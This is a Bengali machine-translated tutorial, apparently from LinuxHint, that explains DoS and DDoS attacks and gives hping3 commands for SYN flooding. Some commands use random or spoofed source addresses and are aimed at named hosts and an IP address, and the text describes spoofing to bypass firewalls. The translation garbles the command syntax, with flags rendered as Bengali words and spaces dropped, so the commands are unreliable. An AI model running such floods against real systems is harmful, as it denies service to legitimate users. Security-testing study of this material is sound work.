ডস আক্রমণ
পরিষেবা প্রত্যাখ্যান (ডস) আক্রমণ একটি খুব সহজ কৌশল যা পরিষেবাগুলিতে অ্যাক্সেসযোগ্যতা অস্বীকার করে (এজন্য এটিকে পরিষেবা আক্রমণ অস্বীকার বলা হয়)। এই আক্রমণটি লক্ষ্যবস্তু ওভারসাইজড প্যাকেট, অথবা সেগুলির একটি বড় পরিমাণের সাথে ওভারলোডিং নিয়ে গঠিত।
যদিও এই আক্রমণ চালানো খুব সহজ, এটি লক্ষ্যমাত্রার তথ্য বা গোপনীয়তার সাথে আপোস করে না, এটি একটি অনুপ্রবেশকারী আক্রমণ নয় এবং লক্ষ্যমাত্রায় প্রবেশাধিকার রোধ করা।
প্রচুর পরিমাণে প্যাকেট পাঠিয়ে লক্ষ্য আক্রমণকারীদের পরিচালনা করতে পারে না যা সার্ভারকে বৈধ ব্যবহারকারীদের পরিবেশন করতে বাধা দেয়।
ডস আক্রমণ একটি একক ডিভাইস থেকে করা হয়, অতএব আক্রমণকারীর আইপি ব্লক করে তাদের থামানো সহজ, তবুও আক্রমণকারী লক্ষ্য আইপি ঠিকানা পরিবর্তন করতে পারে এবং স্পুফ (ক্লোন) করতে পারে কিন্তু ফায়ারওয়ালদের জন্য এই ধরনের আক্রমণ মোকাবেলা করা কঠিন নয় , ডিডিওএস আক্রমণের সাথে যা ঘটে তার বিপরীতে।
ডিডিওএস আক্রমণ
ডিস্ট্রিবিউটেড ডেনিয়াল অফ সার্ভিস অ্যাটাক (ডিডিওএস) একটি ডস আক্রমণের অনুরূপ কিন্তু একই সাথে বিভিন্ন নোড (বা বিভিন্ন আক্রমণকারী) থেকে পরিচালিত হয়। সাধারণত ডিডিওএস আক্রমণ বোটনেট দ্বারা পরিচালিত হয়। বোটনেটগুলি স্বয়ংক্রিয় স্ক্রিপ্ট বা প্রোগ্রাম যা কম্পিউটারকে সংক্রমিত করে একটি স্বয়ংক্রিয় কাজ (এই ক্ষেত্রে ডিডিওএস আক্রমণ)। একজন হ্যাকার একটি বটনেট তৈরি করতে পারে এবং অনেক কম্পিউটারকে সংক্রমিত করতে পারে যেখান থেকে বটনেট ডস আক্রমণ শুরু করবে, আসলে অনেক বোটনেট একযোগে শুটিং করছে ডস আক্রমণকে ডিডিওএস আক্রমণে পরিণত করে (এজন্য এটিকে বিতরণ বলা হয়)।
অবশ্যই, ব্যতিক্রম আছে যেখানে ডিডিওএস আক্রমণ প্রকৃত মানব আক্রমণকারীদের দ্বারা পরিচালিত হয়েছিল, উদাহরণস্বরূপ বিশ্বব্যাপী হাজার হাজার মানুষের সমন্বিত হ্যাকার গোষ্ঠী অ্যানোনিমাস এই কৌশলটি সহজেই প্রয়োগের কারণে খুব সহজেই ব্যবহার করেছিল (এটি কেবলমাত্র স্বেচ্ছাসেবীদের প্রয়োজন ছিল যারা তাদের কারণ ভাগ করেছিল), উদাহরণস্বরূপ, কীভাবে বেনামী গাদ্দাফির লিবিয়ান সরকারকে আক্রমণের সময় সম্পূর্ণভাবে বিচ্ছিন্ন করে রেখেছিল, বিশ্বজুড়ে হাজার হাজার আক্রমণকারীর সামনে লিবিয়ান রাজ্যটি অসহায় হয়ে পড়েছিল।
এই ধরনের আক্রমণ, যখন বিভিন্ন বিভিন্ন নোড থেকে করা হয় তা প্রতিরোধ করা এবং থামানো অত্যন্ত কঠিন এবং সাধারণত মোকাবেলা করার জন্য বিশেষ হার্ডওয়্যারের প্রয়োজন হয়, এর কারণ হল ফায়ারওয়াল এবং প্রতিরক্ষামূলক অ্যাপ্লিকেশন একযোগে হাজার হাজার আক্রমণকারীদের মোকাবেলা করার জন্য প্রস্তুত নয়। এটি hping3 এর ক্ষেত্রে নয়, এই সরঞ্জামটির মাধ্যমে পরিচালিত বেশিরভাগ আক্রমণ প্রতিরক্ষামূলক ডিভাইস বা সফ্টওয়্যার দ্বারা অবরুদ্ধ করা হবে, তবুও এটি স্থানীয় নেটওয়ার্কগুলিতে বা দুর্বল সুরক্ষিত লক্ষ্যগুলির বিরুদ্ধে কার্যকর।
Hping3 সম্পর্কে
Hping3 টুল আপনাকে ম্যানিপুলেটেড প্যাকেট পাঠাতে দেয়। লক্ষ্যটি ওভারলোড এবং ফায়ারওয়ালকে বাইপাস বা আক্রমণ করার জন্য এই সরঞ্জামটি আপনাকে প্যাকেটের আকার, পরিমাণ এবং বিভাজন নিয়ন্ত্রণ করতে দেয়। Hping3 নিরাপত্তা বা সামর্থ্য পরীক্ষার উদ্দেশ্যে দরকারী হতে পারে, এটি ব্যবহার করে আপনি ফায়ারওয়ালগুলির কার্যকারিতা পরীক্ষা করতে পারেন এবং যদি কোন সার্ভার প্রচুর পরিমাণে প্যাকেট পরিচালনা করতে পারে। নীচে আপনি কিভাবে নিরাপত্তা পরীক্ষার উদ্দেশ্যে hping3 ব্যবহার করবেন তার নির্দেশাবলী পাবেন।
Hping3 ব্যবহার করে ডিডিওএস আক্রমণ শুরু করা:
ডেবিয়ান এবং ভিত্তিক লিনাক্স ডিস্ট্রিবিউশনে আপনি hping3 ইনস্টল করে চালাতে পারেন:
#উপযুক্তইনস্টলhping3-এবং 
একটি সাধারণ ডস (ডিডিওএস নয়) আক্রমণ হবে:
#sudohping3-এস -পানি -ভি -পি 80170.155.9.185 
কোথায়:
sudo: hping3 চালানোর জন্য প্রয়োজনীয় সুবিধা দেয়।
hping3: hping3 প্রোগ্রাম কল করে।
-এস: SYN প্যাকেট নির্দিষ্ট করে।
Lফ্লুড: বিবেচনার ভিত্তিতে গুলি করুন, উত্তরগুলি উপেক্ষা করা হবে (এজন্যই উত্তরগুলি দেখানো হবে না) এবং প্যাকেটগুলি যত দ্রুত সম্ভব পাঠানো হবে।
-V: ভার্বোসিটি।
-পি 80: পোর্ট 80, আপনি যে পরিষেবাটি আক্রমণ করতে চান তার জন্য আপনি এই নম্বরটি প্রতিস্থাপন করতে পারেন।
170.155.9.185: লক্ষ্য আইপি।
পোর্ট 80 এর বিপরীতে SYN প্যাকেট ব্যবহার করে বন্যা:
নিচের উদাহরণটি lacampora.org এর বিরুদ্ধে একটি SYN আক্রমণের চিত্র তুলে ধরেছে:
#sudohping3 lacampora.org-কিউ -এন -ডি 120 -এস -পি 80 -পানি --র্যান্ড-সোর্সকোথায়:
Lacampora.org: লক্ষ্য
-ক: সংক্ষিপ্ত আউটপুট
-এন: হোস্টের পরিবর্তে লক্ষ্য আইপি দেখান।
-ডি 120: প্যাকেটের আকার সেট করুন
Ndrand- উৎস: আইপি ঠিকানা লুকান।
নিম্নলিখিত উদাহরণটি আরেকটি বন্যার সম্ভাব্য উদাহরণ দেখায়:
পোর্ট 80 এর বিপরীতে SYN বন্যা:
#sudohping3--র্যান্ড-সোর্সivan.com-এস -কিউ -পি 80 -পানি 
Hping3 এর সাহায্যে আপনি একটি জাল আইপি দিয়ে আপনার টার্গেটকে আক্রমণ করতে পারেন, ফায়ারওয়ালকে বাইপাস করার জন্য আপনি নিজের টার্গেট আইপি নিজেই ক্লোন করতে পারেন, অথবা যে কোন অনুমোদিত ঠিকানা যা আপনি জানেন (আপনি এটি অর্জন করতে পারেন উদাহরণস্বরূপ Nmap বা একটি স্নিফার দিয়ে প্রতিষ্ঠিত শুনতে সংযোগ)।
সিনট্যাক্স হবে:
#sudohping3-প্রতি <নকল আইপি> <লক্ষ্য> -এস -কিউ -পি 80 -দ্রুত -সি 2এই ব্যবহারিক উদাহরণে আক্রমণ মনে হবে:
#sudohping3-প্রতি190.0.175.100 190.0.175.100-এস -কিউ -পি 80 -দ্রুত -সি 2 
আমি আশা করি আপনি hping3 এ এই টিউটোরিয়ালটি দরকারী পেয়েছেন। লিনাক্স এবং নেটওয়ার্কিং সম্পর্কে আরও টিপস এবং আপডেটের জন্য LinuxHint অনুসরণ করুন।